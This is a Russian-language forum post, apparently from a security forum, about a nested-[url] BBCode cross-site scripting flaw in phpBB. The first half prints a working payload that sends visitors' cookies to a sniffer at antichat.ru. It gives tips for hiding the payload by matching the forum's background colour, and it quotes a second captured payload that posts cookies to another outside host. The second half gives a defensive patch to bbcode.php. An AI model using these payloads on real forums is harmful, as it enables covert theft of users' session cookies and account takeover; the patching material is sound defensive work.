Эксплойт:
PHP код:
[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval( this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Этот эксплоит отсылает куки пользователя на сниффер по адресу antichat.ru/cgi-bin/s.jpg.
Важно:
Весь код следует оставить одной строкой, т.к. перевод строки не допускается регулярным выражением в скрипте парсинга.
На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку.
Весь тест вашего комментария/новости следует писать выше внедряемого эксплоита, т.к. структура выходного HTML кода неправильна и весь последующий текст будет воспринят как ссылка.
После лечения вместо эксплойта мы получим
[error_url]www.ut[error_url=www.s=''style='font-size:0;color:red'style='top:expression(eval(this.s ss));'sss=#i=new/**/Image();i.src='http://wholesale.co.il/files/cook.php?'+document.cookie;this.sss=null#style='fo nt-size:0;][/url][/url]'
Теперь мы имеем защиту от "вложенных" URL в виде [error_url]
И запрет на использование ненужных нам символов, таких как обратные кавычки и т.д.
Теперь подобные шутки будет видно на раз.
Лечение:
Открыть includes/bbcode.php
Найти:
PHP код:
// matches a [url]xxxx://www.phpbb.com[/url] code..
$patterns[] = "#\[url\]([\w]+?://[^ \"\n\r\t<]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];
// [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[^ \"\n\r\t<]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url2'];
// [url=xxxx://www.phpbb.com]phpBB[/url] code..
$patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url3'];
// [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url4'];
Заменить на:
PHP код:
// matches a [url]xxxx://www.phpbb.com[/url] code..
$patterns[] = "#\[url\]([\w]+?://[a-z0-9\_\-\.\/\%\?\=\&\;\@\:\#]+)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];
// [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[a-z0-9\_\-\.\/\%\?\=\&\;\@\:\#]+)\[/url\]#is";
$replacements[] = $bbcode_tpl['url2'];
// [url=xxxx://www.phpbb.com]phpBB[/url] code..
$patterns[] = "#\[url=([\w]+?://[a-z0-9\_\-\.\/\%\?\=\&\;\@\:\#]+)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url3'];
// [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
$patterns[] = "#\[url=((www|ftp)\.[a-z0-9\_\-\.\/\%\?\=\&\;\@\:\#]+)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url4'];
Найти:
PHP код:
// Patterns and replacements for URL and email tags..
$patterns = array();
Перед ним добавить:
PHP код:
// [url...[url exploit checking...
$text = check_url_exploit($text);
В конце файла перед ?> добавить функцию:
PHP код:
function check_url_exploit($text) {
$offset=0;
while(true) {
$pos_open=strpos($text,'[url',$offset);
if ($pos_open===false) {
break;
} else {
$offset=$pos_open+1;
}
$pos_next=strpos($text,'[url',$pos_open+1);
$pos_close=strpos($text,'[/url',$pos_open+1);
if (($pos_next !== false) && ($pos_next < $pos_close)) {
$text = substr($text,0,$pos_open) .
str_replace('[url','[error_url',substr($text,$pos_open,$pos_close-$pos_open)) .
substr($text,$pos_close);
}
}
return $text;
}
Ну вот и все теперь жить можно спокойно
